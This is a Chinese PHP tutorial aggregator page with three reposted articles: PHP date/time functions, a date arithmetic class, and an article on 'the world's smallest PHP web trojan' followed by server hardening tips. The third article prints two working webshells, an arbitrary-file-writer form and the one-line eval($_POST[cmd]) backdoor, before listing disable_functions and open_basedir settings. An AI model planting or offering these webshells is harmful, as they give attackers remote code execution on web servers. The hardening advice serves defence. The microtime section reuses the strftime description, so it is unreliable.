PHP 日期时间函数的高级应用...-PHP 日期加减的类，很不错-全世界最小的php网页木马一枚附PHP木马的防范方法

当前位置: 编程技术>php

本页文章导读:

▪PHP 日期时间函数的高级应用技巧 PHP的日期时间函数date() 1，年-月-日 echo date('Y-m-j'); 2007-02-6 echo date('y-n-j'); 07-2-6 大写Y表示年四位数字，而小写y表示年的两位数字；小写m表示月份的数字(带前导)，而小写n则表示不带前导的.........

▪PHP 日期加减的类，很不错如何使用这个类呢？请看下面的演示：代码如下: $temptime = time(); echo strftime ( "%Hh%M %A %d %b" , $temptime ); $date = new DateAccount(); $temptime = $date ->DateAdd( "n" ,50, $temptime ); echo "<p>" ; echo strftime .........

▪全世界最小的php网页木马一枚附PHP木马的防范方法 php网页木马代码如下:<?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?> <form method="POST"> 保存文件名: <input type="text" n.........

[1]PHP 日期时间函数的高级应用技巧

来源: 互联网发布时间: 2013-11-30

PHP的日期时间函数date()
1，年-月-日
echo date('Y-m-j');
2007-02-6
echo date('y-n-j');
07-2-6
大写Y表示年四位数字，而小写y表示年的两位数字；
小写m表示月份的数字(带前导)，而小写n则表示不带前导的月份数字。
echo date('Y-M-j');
2007-Feb-6
echo date('Y-m-d');
2007-02-06
大写M表示月份的3个缩写字符，而小写m则表示月份的数字(带前导0);
没有大写的J，只有小写j表示月份的日期，无前导o；若需要月份带前导则使用小写d。
echo date('Y-M-j');
2007-Feb-6
echo date('Y-F-jS');
2007-February-6th
大写M表示月份的3个缩写字符，而大写F表示月份的英文全写。(没有小写f)
大写S表示日期的后缀，比如“st”、“nd”、“rd”和“th”，具体看日期数字为何。
小结：
表示年可以用大写的Y和小写y;
表示月可以用大写F、大写M、小写m和小写n(分别表示字符和数字的两种方式);
表示日可以用小写d和小写j，大写S表示日期的后缀。

2，时:分:秒
默认情况下，PHP解释显示的时间为“格林威治标准时间”，与我们本地的时间相差8个小时。
echo date('g:i:s a');
5:56:57 am
echo date('h:i:s A');
05:56:57 AM
小写g表示12小时制，无前导0，而小写h则表示有前导0的12小时制。
当使用12小时制时需要表明上下午，小写a表示小写的“am”和“pm”，大写A表示大写的“AM”和“PM”。
echo date('G:i:s');
14:02:26
大写G表示24小时制的小时数，但是不带前导的；使用大写的H表示带前导的24小时制小时数
小结：
字母g表示小时不带前导，字母h表示小时带前导；
小写g、h表示12小时制，大写G、H表示24小时制。
3，闰年、星期、天
echo date('L');
今年是否闰年：0
echo date('l');
今天是：Tuesday
echo date('D');
今天是：Tue
大写L表示判断今年是否闰年，布尔值，为真返回1，否则为0；
小写l表示当天是星期几的英文全写(Tuesday)；
而使用大写D表示星期几的3个字符缩写(Tue)。
echo date('w');
今天星期：2
echo date('W');
本周是全年中的第 06 周
小写w表示星期几，数字形式表示
大写W表示一年中的星期数
echo date('t');
本月是 28 天
echo date('z');
今天是今年的第 36 天
小写t表示当前月份又多少天
小写z表示今天是本年中第几天
4，其他
echo date('T');
UTC
大写T表示服务器的时间区域设置
echo date('I');
0
大写I表示判断当前是否为夏令时，为真返回1，否则为0
echo date('U');
1170769424
大写U表示从1970年1月1日到现在的总秒数，就是Unix时间纪元的UNIX时间戳。
echo date('c');
2007-02-06T14:24:43+00:00
小写c表示ISO8601日期，日期格式为YYYY-MM-DD，用字母T来间隔日期和时间，时间格式为HH:MM:SS，时区使用格林威治标准时间(GMT)的偏差来表示。
echo date('r');
Tue, 06 Feb 2007 14:25:52 +0000
小写r表示RFC822日期。

小小的date()函数就显示出了PHP的强大功能和迷人魅力，再比较下ASP，呵呵。
checkdate($month,$date,$year)
如果应用的值构成一个有效日期，则该函数返回为真。例如，对于错误日期2005年2月31日，此函数返回为假。
在日期用于计算或保存在数据库中之前，可用此函数检查日期并使日期生效。

代码如下:

<?php
// returns false
echo checkdate(2,30,2005) ? "valid" : "invalid";
// returns true
echo checkdate(4,6,2010) ? "valid" : "invalid";
?>

getdate($ts)
在没有自变量的情况下，该函数以结合数组的方式返回当前日期与时间。数组中的每个元素代表日期/时间值中的一个特定组成部分。可向函数提交可选的时间标签自变量，以获得与时间标签对应的日期/时间值。
应用此函数来获得一系列离散的，容易分离的日期/时间值。

代码如下:

<?php
// get date as associative array
$arr = getdate();
echo "Date is " . $arr['mday'] . " " . $arr['weekday'] . " " . $arr['year'];
echo "Time is " . $arr['hours'] . ":" . $arr['minutes'];
?>

mktime($hour, $minute, $second, $month, $day, $year)
此函数的作用与getdate()的作用相反：它由一系列的日期与时间值生成一个UNIX时间标签（GMT时间1970年1月1日到现在消逝的秒数）。不用自变量时，它生成当前时间的UNIX时间标签。
用此函数获得即时时间的UNIX时间标签。这种时间标签通常用于许多数据库与程序语言中。

代码如下:

<?php
// returns timestamp for 13:15:23 7-Jun-2006
echo mktime(13,15,23,6,7,2006);
?>

date($format, $ts)
此函数将UNIX时间标签格式化成一个可人为阅读的日期字符串。它是PHP日期/时间API中功能最为强大的函数，可用在一系列的修正值中，将整数时间标签转变为所需的字符串格式。
为显示格式化时间或日期时，应用此函数。

代码如下:

<?php
// format current date
// returns "13-Sep-2005 01:16 PM"
echo date("d-M-Y h:i A", mktime());
?>

strtotime($str)
此函数将可人为阅读的英文日期/时间字符串转换成UNIX时间标签。
应用此函数将非标准化的日期/时间字符串转换成标准、兼容的UNIX时间标签。

代码如下:

<?php
// returns 13-Sep-05
echo date("d-M-y", strtotime("today"));
// returns 14-Sep-05
echo date("d-M-y", strtotime("tomorrow"));
// returns 16-Sep-05
echo date("d-M-y", strtotime("today +3 days"));
?>

strftime($format,$ts)
如前面的setlocale()函数定义的那样，此函数将UNIX时间标签格式化成适用于当前环境的日期字符串。
应用此函数建立与当前环境兼容的日期字符串。

代码如下:

<?php
// set locale to France (on Windows)
setlocale(LC_TIME, "fra_fra");
// format month/day names
// as per locale setting
// returns "septembre" and "mardi"
echo strftime("Month: %B ");
echo strftime("Day: %A ");
?>

microtime()
如前面的setlocale()函数定义的那样，此函数将UNIX时间标签格式化成适用于当前环境的日期字符串。
应用此函数建立与当前环境兼容的日期字符串。

代码如下:

<?php
// get starting value
$start = microtime();
// run some code
for ($x=0; $x<1000; $x++) {
$null = $x * $x;
}
// get ending value
$end = microtime();
// calculate time taken for code execution
echo "Elapsed time: " . ($end - $start) ." sec";
?>

gmmktime($hour, $minute, $second, $month, $day, $year)
此函数由一系列用GMT时间表示的日期与时间值生成一个UNIX时间标签。不用自变量时，它生成一个当前GMT即时时间的UNIX时间标签。
用此函数来获得GMT即时时间的UNIX时间标签。

代码如下:

<?php
// returns timestamp for 12:25:23 9-Jul-2006
echo gmmktime(12,25,23,7,9,2006);
?>

gmdate($format, $ts)
此函数将UNIX时间标签格式化成可人为阅读的日期字符串。此日期字符串以GMT（非当地时间）表示。
用GMT表示时间标签时应用此函数。

代码如下:

<?php
// format current date into GMT
// returns "13-Sep-2005 08:32 AM"
echo gmdate("d-M-Y h:i A", mktime());
?>

date_default_timezone_set($tz)、date_default_timezone_get()
此函数此后所有的日期/时间函数调用设定并恢复默认的时区。
注：此函数仅在PHP 5.1+中有效。
此函数是一个方便的捷径，可为以后的时间操作设定时区。

代码如下:

<?php
// set timezone to UTC
date_default_timezone_set('UTC');
?>

[2]PHP 日期加减的类，很不错

来源: 互联网发布时间: 2013-11-30

如何使用这个类呢？请看下面的演示：

代码如下:

$temptime = time();
echo strftime ( "%Hh%M %A %d %b" , $temptime );
$date = new DateAccount();
$temptime = $date ->DateAdd( "n" ,50, $temptime );
echo "<p>" ;
echo strftime ( "%Hh%M %A %d %b" , $temptime );

代码如下:

$temptime = time();
echo strftime( "%Hh%M %A %d %b",$temptime);
$date = new DateAccount();
$temptime = $date->DateAdd("n" ,50,$temptime);
echo "<p>";
echo strftime( "%Hh%M %A %d %b",$temptime);

如果一切顺利，你可以看到以下结果：
15h41 Saturday 03 Jun
16h31 Saturday 03 Jun

代码如下:

$currenttime = time();
echo "Current time: " . strftime ( "%Hh%M %A %d %b" , $currenttime ). "<br>" ;
$date = new DateAccount();
$newtime = $date ->DateAdd ( "n" ,50 , $currenttime );
echo "Time plus 50 minutes: " . strftime ( "%Hh%M %A %d %b" , $newtime ). "<br>" ;
$temptime = $date ->DateDiff ( "n" , $currenttime , $newtime );
echo "Interval between two times: " . $temptime ;

代码如下:

$currenttime = time();
echo "Current time: ". strftime("%Hh%M %A %d %b" ,$currenttime)."<br>";
$date = new DateAccount();
$newtime = $date->DateAdd ("n",50 ,$currenttime);
echo "Time plus 50 minutes: ". strftime("%Hh%M %A %d %b" ,$newtime)."<br>";
$temptime = $date->DateDiff ("n",$currenttime ,$newtime);
echo "Interval between two times: ".$temptime;

如果一切顺利，你可以看到以下结果：
Current time: 16h23 Saturday 03 Jun
Time plus 50 minutes: 17h13 Saturday 03 Jun
Interval between two times: 50

代码如下:

<?php
class DateAccount{
function __construct(){
}
function DateAdd ( $interval , $number , $date ) {
$date_time_array = getdate ( $date );
$hours = $date_time_array [ "hours" ];
$minutes = $date_time_array [ "minutes" ];
$seconds = $date_time_array [ "seconds" ];
$month = $date_time_array [ "mon" ];
$day = $date_time_array [ "mday" ];
$year = $date_time_array [ "year" ];
switch ( $interval ) {
case "yyyy" : $year += $number ; break ;
case "q" : $month +=( $number *3); break ;
case "m" : $month += $number ; break ;
case "y" :
case "d" :
case "w" : $day += $number ; break ;
case "ww" : $day +=( $number *7); break ;
case "h" : $hours += $number ; break ;
case "n" : $minutes += $number ; break ;
case "s" : $seconds += $number ; break ;
}
$timestamp = mktime ( $hours , $minutes , $seconds , $month , $day , $year );
return $timestamp ;
}
function DateDiff ( $interval , $date1 , $date2 ) {
$timedifference = $date2 - $date1 ;
switch ( $interval ) {
case "w" : $retval = bcdiv ( $timedifference ,604800); break ;
case "d" : $retval = bcdiv ( $timedifference ,86400); break ;
case "h" : $retval = bcdiv ( $timedifference ,3600); break ;
case "n" : $retval = bcdiv ( $timedifference ,60); break ;
case "s" : $retval = $timedifference ; break ;
}
return $retval ;
}
}
?>

[3]全世界最小的php网页木马一枚附PHP木马的防范方法

来源: 互联网发布时间: 2013-11-30

php网页木马

代码如下:

<?php
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>
<form method="POST">
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>">
<br><br>
<textarea name="text" COLS="70" ROWS="18" ></textarea>
<br><br>
<input type="submit" name="submit" value="保存">
<form>
<?php
if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!';
@fclose($fp);
}
?>

一句话php木马

代码如下:

<?php eval($_POST[cmd]);?>

PHP木马的防范方法
PHP是能让你生成动态网页的工具之一。PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。
PHP代表，超文本预处理器（PHP: Hypertext Preprocessor），可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可（GPL)，在这一许可下诞生了许多流行的软件诸如Linux和Emacs。PHP在大多数Unix平台，GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。
PHP的另一好处就在于他的安全性，随着现在互联网的发展，网络安全越来越受重视，PHP的诞生几乎代替了ASP，因为PHP对于安全方面的设置是极为简单的不像ASP那样需要很多的步骤，和禁用很多的服务。不过再好的东西也始终会有不足，如果默认设置的PHP同意也是不堪一击，因此本文就来讲一下如何对PHP进行一些安全方面的配置，来防止脚本木马的破坏。
一、防止php木马执行webshell
打开safe_mode，在，php.ini中设置 disable_functions= passthru，exec，shell_exec，system 二者选一即可，也可都选。
二、防止跳出web目录
首先修改httpd.conf，如果你只允许你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs，那么在httpd.conf里加上这么几行： php_admin_value open_basedir /usr/local/apache/htdocs ，如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许，如果错误显示打开的话会提示这样的错误： Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。
三、防止php木马读写文件目录
在php.ini中的 disable_functions= passthru，exec，shell_exec，system 后面加上php处理文件的函数，主要有 fopen，mkdir，rmdir，chmod，unlink，dir，fopen，fread，fclose，fwrite，file_exists，closedir，is_dir，readdir.opendir，fileperms.copy，unlink，delfile 。即成为 disable_functions= passthru，exec，shell_exec，system，fopen，mkdir，rmdir，chmod，unlink，dir ，fopen，fread，fclose，fwrite，file_exists ，closedir，is_dir，readdir.opendir ，fileperms.copy，unlink，delfile 。
ok，大功告成，php木马拿我们没辙了，遗憾的是这样的话，利用文本数据库的那些东西就都不能用了。如果是在windos平台下搭建的apache还需要注意一点，apache默认运行是system权限，必须给apache降降权限，如下：
net user apache f**kmicrosoft /add
net localgroup users apache /del
此时建立了一个不属于任何组的用户apche，只要打开计算机管理器-服务-apache服务的属性-log on-this account，在这里填入上面所建立的账户和密码，重启apache服务即可实现apache运行在低权限下。
总结：实际上还可以通过设置各个文件夹的权限，给每一个目录建立一个单独能读写的用户，来实现安全。当前很多虚拟主机提供商的流行配置方法，不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识，相对的禁闭不用的功能就可以保证网络安全的威胁。

下面是mcafee的安全设置，防止一些网页木马生成文件等。
http://www./hack/list461_1.html